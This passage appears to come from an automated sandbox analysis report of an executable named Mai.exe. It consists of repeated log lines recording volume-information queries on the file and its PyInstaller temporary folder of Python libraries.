                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\libffi-8.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\select.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
